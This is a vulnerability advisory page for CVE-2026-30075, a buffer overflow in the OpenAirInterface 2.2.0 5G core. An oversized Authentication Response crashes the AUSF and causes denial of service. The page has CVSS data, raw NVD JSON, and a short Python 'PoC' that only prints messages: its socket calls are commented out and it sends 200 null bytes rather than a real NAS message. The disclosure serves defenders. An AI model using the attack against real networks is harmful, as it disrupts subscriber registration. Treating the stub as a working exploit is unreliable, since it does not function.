Security Vulnerability Report
CVE-2026-30075 CVSS 7.5 HIGH

CVE-2026-30075

Published: 2026-04-08 17:21:19
Last Modified: 2026-04-14 15:47:24

Description

OpenAirInterface version 2.2.0 has a buffer overflow vulnerability in the processing of an UplinkNASTransport message that carries an Authentication Response whose NAS PDU contains an oversized response (for example, 100 bytes). The response is decoded by the AMF and passed to the AUSF component for verification. The AUSF crashes on receiving this oversized response. This can prevent users from further registration and verification and can cause a denial of service (DoS).

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:* - VULNERABLE
OpenAirInterface 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-30075
# This script demonstrates how to send a crafted NAS PDU to trigger the buffer overflow.
# Note: This is a conceptual demonstration and requires a 5G stack library to construct valid NAS messages.
import socket

# Target AUSF component (or AMF which forwards to AUSF)
# In a real scenario, this would be the AMF IP/Port listening for N1/N2 traffic.
TARGET_IP = "192.168.1.100"
TARGET_PORT = 38412  # Example SCTP port for NGAP

# Construct a malicious payload
# A normal Authentication Response is much smaller.
# We send a large buffer (e.g., 100 bytes or more) to overflow the reading buffer in AUSF.
malicious_payload = b"\x00" * 200  # 200 bytes of null bytes

# In a real 5G attack, this would be wrapped in a NAS Authentication Response message
# inside a Uplink NAS Transport container sent via NGAP.
# For demonstration purposes, we simulate sending the raw oversized data.
def send_exploit():
    try:
        # Create a socket (SCTP is typically used for NGAP, but TCP shown for simplicity)
        # In practice, tools like Scapy with SCTP support or specific 5G test tools (e.g., srsRAN) are used.
        print(f"[*] Sending malicious payload to {TARGET_IP}:{TARGET_PORT}")
        # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # sock.connect((TARGET_IP, TARGET_PORT))
        # sock.send(malicious_payload)
        # sock.close()
        print("[+] Payload sent. If vulnerable, AUSF should crash.")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    send_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30075", "sourceIdentifier": "[email protected]", "published": "2026-04-08T17:21:18.503", "lastModified": "2026-04-14T15:47:23.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenAirInterface Version 2.2.0 has a Buffer Overflow vulnerability in processing UplinkNASTransport containing Authentication Response containing a NAS PDU with oversize response (For example 100 byte). The response is decoded by AMF and passed to the AUSF component for verification. AUSF crashes on receiving this oversize response. This can prohibit users from further registration and verification and can cause Denial of Services (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1BB4900E-B5A7-40ED-8DA6-4E372D5036D9"}]}]}], "references": [{"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}